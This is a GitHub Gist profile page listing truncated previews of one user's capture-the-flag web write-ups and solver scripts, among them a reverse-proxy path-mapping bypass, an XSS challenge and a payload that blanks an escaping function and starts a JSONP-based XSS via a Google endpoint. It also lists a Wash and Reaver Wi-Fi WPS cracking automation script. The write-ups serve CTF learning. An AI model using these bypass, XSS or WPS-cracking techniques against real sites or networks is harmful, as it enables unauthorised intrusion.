Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Learning

Jorge jorgectf

🎯
Learning
View GitHub Profile
@jorgectf
jorgectf / LINE CTF 2022 - title todo.md
Last active May 14, 2022
LINE CTF 2022 - title todo
View LINE CTF 2022 - title todo.md
@jorgectf
jorgectf / TSJ_CTF_2022_NimjaAtNantou.md
Last active Mar 26, 2022
TSJ CTF 2022 - Nimja at Nantou solution
View TSJ_CTF_2022_NimjaAtNantou.md

Nimja at Nantou

map /hello-from-the-world/key http://127.0.0.1:80/forbidden
map /hello-from-the-world/    http://127.0.0.1:80
map /service-info/admin       http://127.0.0.1:5000/forbidden
map /service-info/            http://127.0.0.1:5000/

Mapping /hello-from-the-world/ to http://127.0.0.1:80 (without the last slash) makes /hello-from-the-world//key not to match the first rule but provides a valid path to the second rule. This let us get the key:

@jorgectf
jorgectf / DefCamp_2020.md
Last active Nov 22, 2021
Solution for some DefCamp 2020 CTF's Web challenges.
@jorgectf
jorgectf / DragonSector_2020_Scratchpad.md
Last active Nov 22, 2021
Solution for DragonSector 2020 CTF's ScratchPad challenge.
@jorgectf
jorgectf / intigriti-xss-10-2021.md
Last active Nov 21, 2021
Intigriti's October 2021 XSS challenge writeup.
View intigriti-xss-10-2021.md

TL;DR

This month's challenge consists of the exploitiation of a custom js code hosted on a document with a Halloween style. In overview we'll be injecting JS inside a <script> tag (thanks to an interesting detail in the CSP) that was previously injected into a document's div's innerHTML.

The solution of this challenge has been found in collaboration with @carlospolopm.

Initial approach

imagen

@jorgectf
jorgectf / sync_discord_bot.py
Created Aug 28, 2021
Synchronized Discord bot in Python 3.
View sync_discord_bot.py
from discord import Client, CategoryChannel
import discord.utils
from time import sleep
import threading
import asyncio
import os
class Bot(Client):
guild = None
guild_id = os.getenv("DISCORD_GUILD_ID", None)
@jorgectf
jorgectf / washXreaver.sh
Last active Aug 14, 2021 — forked from iGh0st/d4rk-r34v3r.sh
Wash and Reaver automation script.
View washXreaver.sh
#!/bin/bash
if [ "$#" -ne 1 ]; then
echo "Illegal number of parameters"
echo "./{} INTERFACE"
fi
interface=$1
if (( EUID != 0 )); then
@jorgectf
jorgectf / LineCTF_2021_Your-Notes.py
Last active Mar 21, 2021
Line's CTF Your Notes solver.
View LineCTF_2021_Your-Notes.py
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string, subprocess
def random_string(length):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
@jorgectf
jorgectf / NahamConCTF_2021_AgentTester.py
Last active Mar 15, 2021
NahamCon CTF's AgentTester solver.
View NahamConCTF_2021_AgentTester.py
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string
import requests
def random_string(length):
@jorgectf
jorgectf / AeroCTF_2021_Not-received-points.md
Last active Mar 1, 2021
AeroCTF 2021's "Not received points" solution.
View AeroCTF_2021_Not-received-points.md

Void _.escape

// this made empty the client-side func that escaped our input
_.escape = function(s) {return s}

Leak flag image uri

// XSS through JSONP from accounts.google.com
ipt src="https://accounts.google.com/o/oauth2/revoke?callback=(function(){